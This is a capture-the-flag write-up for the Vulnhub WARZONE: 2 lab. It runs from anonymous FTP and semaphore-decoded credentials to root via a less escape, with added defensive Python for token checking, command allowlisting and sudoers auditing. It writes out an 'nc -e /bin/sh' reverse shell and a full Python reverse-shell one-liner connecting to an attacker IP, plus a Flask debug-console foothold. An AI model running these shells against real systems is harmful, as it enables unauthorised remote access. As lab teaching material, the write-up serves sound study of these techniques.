Vulnhub - WARZONE: 2
Introduction
Enumeration, Flask, Port Forwarding, GTFOBins
Created and Tested in Virtual box (NAT network)
Hint : lowercase letters
This is WARZONE: 2 from Vulnhub.
Ports
We’ve got three open ports: FTP, SSH and 1337. What’s on 1337? nmap doesn’t tell us much, so let’s connect with netcat:
Okay, it’s the SECRET SYSTEM REMOTE ACCESS. Let’s come back to this in a minute.
FTP
Anonymous login is allowed, and the directory holds three PNG images, named username, password and token. The username and password files are pictures of semaphore flag messages; decoding them against a semaphore chart gives the combination:
semaphore:signalperson
The token PNG explains how to generate a token: essentially a SHA256 hash of the username and password. It comes to:
833ad488464de1a27d512f104b639258e77901f14eab706163063d34054a7b26
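To check a token of this kind against an observed value, here is an added Python example (my code, not the author's and not anything from the VM). It hashes the username and password with SHA-256, and because the page does not show exactly how the two values are joined, it tries several candidate separators and reports which one reproduces a given digest. The separator list and the helper names are my assumptions.

```python
import hashlib

# Candidate ways the two values might be joined before hashing. This is an
# assumption: the write-up only says "SHA256 hash of the username and
# password" without showing the exact format from the token image.
CANDIDATE_SEPARATORS = ("", ":", "|", " ", "\n")


def derive_token(username: str, password: str, separator: str = "") -> str:
    """Return the lowercase hex SHA-256 digest of username + separator + password."""
    material = f"{username}{separator}{password}".encode("utf-8")
    return hashlib.sha256(material).hexdigest()


def find_token_format(username: str, password: str, expected: str):
    """Report which separator (if any) reproduces an observed token.

    Returns the separator string, or None when no candidate matches. Handy for
    confirming what a client really hashes before trusting a token scheme.
    """
    expected = expected.strip().lower()
    for sep in CANDIDATE_SEPARATORS:
        if derive_token(username, password, sep) == expected:
            return sep
    return None


if __name__ == "__main__":
    # Credentials decoded from the semaphore images in the write-up.
    user, pw = "semaphore", "signalperson"
    for sep in CANDIDATE_SEPARATORS:
        print(f"separator {sep!r:6} -> {derive_token(user, pw, sep)}")
```

One design caveat this makes visible: a token that is nothing more than a hash of the username and password carries no secret beyond the credentials themselves, so anyone who can read the two images can mint it; a keyed construction such as an HMAC with a server-side key would not have that property.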
1337
With the credentials above we can log in to the secret system over netcat. Only three commands are available:
We can’t pass a directory to ls, so we can’t list files outside /home/flagman. However, nc accepts extra arguments, so we can run:
[semaphore] > nc -e /bin/sh 192.168.1.77 1234
And with a listener we get our first shell.
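The weakness here is a restricted shell that checks only the command name and passes the rest of the line through untouched. As an added example (my code, not the VM's service, whose real rules are not shown in the write-up), the snippet below contrasts that name-only check with a policy that validates each command's arguments positively; the allowlist contents, validator names and host/port rules are constructed for illustration.

```python
import re
import shlex

# Constructed name-only allowlist: mirrors what the write-up observes, where
# the command name is checked but its arguments are not inspected.
NAME_ONLY_ALLOWLIST = {"help", "ls", "nc"}

HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def _no_arguments(args: list[str]) -> bool:
    """ls and help take no arguments at all (no directory, no flags)."""
    return len(args) == 0


def _host_and_port(args: list[str]) -> bool:
    """nc may only receive a hostname/IP and a numeric port; flags such as -e
    are rejected because they never match the two expected positional shapes."""
    if len(args) != 2:
        return False
    host, port = args
    return bool(HOST_RE.match(host)) and port.isdigit() and 1 <= int(port) <= 65535


# Constructed strict policy: every allowed command has an argument validator.
STRICT_POLICY = {"help": _no_arguments, "ls": _no_arguments, "nc": _host_and_port}


def check_name_only(line: str) -> bool:
    """Weak check: only the first word is compared against the allowlist."""
    try:
        argv = shlex.split(line)
    except ValueError:  # unbalanced quotes
        return False
    return bool(argv) and argv[0] in NAME_ONLY_ALLOWLIST


def check_strict(line: str) -> bool:
    """Stronger check: the command must be allowed and its arguments must
    satisfy that command's validator; anything unexpected is rejected."""
    try:
        argv = shlex.split(line)
    except ValueError:  # unbalanced quotes
        return False
    if not argv or argv[0] not in STRICT_POLICY:
        return False
    return STRICT_POLICY[argv[0]](argv[1:])


if __name__ == "__main__":
    samples = ("ls", "ls /etc", "nc 192.168.1.77 1234", "nc -e /bin/sh 192.168.1.77 1234")
    for cmd in samples:
        print(f"{cmd!r:40} name-only={check_name_only(cmd)!s:5} strict={check_strict(cmd)}")
```

Whatever passes the strict check should still be executed as an argv list without a shell, so that validated words cannot be re-parsed; and for a service like this one the simplest fix is not to expose nc at all.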
www-data
With some enumeration as www-data we can find an SSH password for flagman:
Flagman
Now we can SSH in as flagman. Once there, we find that flagman can run one command as admiral, so let’s run it:
So what is this? It’s a Flask app running in debug mode, bound to localhost. To reach it from Kali we set up an SSH local port forward:
root@kali:/opt/vulnhub/warzone2# ssh -L 9999:127.0.0.1:5000 flagman@192.168.1.144
Then from Kali we can browse to http://localhost:9999/ and reach the webapp.
Flask
The front page doesn’t give much away:
Warzone 2
Under construction
search result :None
I run gobuster against the forwarded port:
root@kali:/opt/vulnhub/warzone2# gobuster dir -u http://localhost:9999 -w /usr/share/seclists/Discovery/Web-Content/common.txt
This finds /console, the Flask debug console. After entering the PIN we found earlier, we can run Python commands in it.
I use the Pentestmonkey Python reverse shell one-liner with a new listener:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.77",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
And now I have a shell as admiral.
Admiral to root
admiral can run one command as root: less on /var/public/warzone-rules.txt. Per GTFOBins, less can spawn a shell, so we run the command and then run !/bin/sh from inside less.
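The lesson for a defender is that pinning less to a single file does not help, because the escape happens inside less itself. As an added example (my code, not part of the write-up or the VM), the script below audits sudoers-style rules for commands that grant a program known to spawn a shell, treating a rule tagged NOEXEC as mitigated. The sample rules are constructed; only the less rule mirrors the one described above, and the binary list is a starting point to extend rather than a complete catalogue.

```python
import os
import re
import shlex

# Starting list of binaries documented (for example on GTFOBins) as able to
# spawn a shell or run commands when executed with elevated privileges.
SHELL_ESCAPE_BINARIES = {
    "less", "more", "man", "vi", "vim", "nano", "awk", "find", "env",
    "python", "python3", "perl", "ruby", "bash", "sh", "zsh", "tar", "zip",
}

# Grammar subset handled: user  host(s)=(runas) [TAG:]... command [args], command2 ...
SUDOERS_RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>\S+?)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<commands>.+)$"
)

# Constructed sample (not the VM's real sudoers). The admiral line mirrors the
# rule described in the write-up; the others show mitigated and safe variants.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
admiral ALL=(root) NOPASSWD: /usr/bin/less /var/public/warzone-rules.txt
ops     ALL=(root) /usr/bin/vim /etc/app.conf, /usr/sbin/reboot
audit   ALL=(root) NOEXEC: /usr/bin/less /var/log/syslog
backup  ALL=(root) NOPASSWD: /bin/cat /var/public/warzone-rules.txt
"""


def find_risky_rules(sudoers_text: str) -> list[dict]:
    """Return one finding per command spec that grants ALL or a program from
    SHELL_ESCAPE_BINARIES, skipping specs whose rule carries the NOEXEC tag."""
    findings = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line or line.startswith("Defaults"):
            continue
        m = SUDOERS_RULE.match(line)
        if not m:
            continue
        user, tags = m.group("user"), m.group("tags")
        for spec in m.group("commands").split(","):
            spec = spec.strip()
            if spec == "ALL":
                findings.append({"user": user, "command": spec,
                                 "reason": "unrestricted (ALL)"})
                continue
            try:
                argv = shlex.split(spec)
            except ValueError:  # unbalanced quotes; not a parseable spec
                continue
            if not argv:
                continue
            binary = os.path.basename(argv[0])
            if binary in SHELL_ESCAPE_BINARIES and "NOEXEC:" not in tags:
                findings.append({"user": user, "command": spec,
                                 "reason": f"{binary} can spawn a shell; "
                                           "fixed arguments do not prevent it"})
    return findings


if __name__ == "__main__":
    for f in find_risky_rules(SAMPLE_SUDOERS):
        print(f"{f['user']:8} {f['command']:50} {f['reason']}")
```

Two real sudoers mitigations are visible in the sample: the NOEXEC tag, which blocks programs started by the granted command, and replacing an interactive pager with a non-interactive reader such as cat when the goal is only to show a file.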
Final Thoughts
I really enjoyed this one, it was a cracker. Easily my favourite since Nully 1. Thanks Alienum.